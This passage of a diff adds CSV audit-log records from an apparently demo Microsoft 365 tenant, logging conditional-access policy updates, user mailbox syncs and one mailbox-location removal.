+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-01T05:59:10Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/1/2020 5:59:10 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-29T10:45:50Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-29T13:39:03Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-29T15:02:53Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-29T15:01:44Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\6345c630-b487-4e0d-8460-0777018f3c31""
+  },
+  {
+    ""Name"": ""IgnoreLegalHold"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-30T00:39:24Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T06:02:13Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 6:02:13 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:37:04Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-30T03:09:38Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-30T02:48:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:54 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/30/2020 2:48:55 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-30T02:48:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
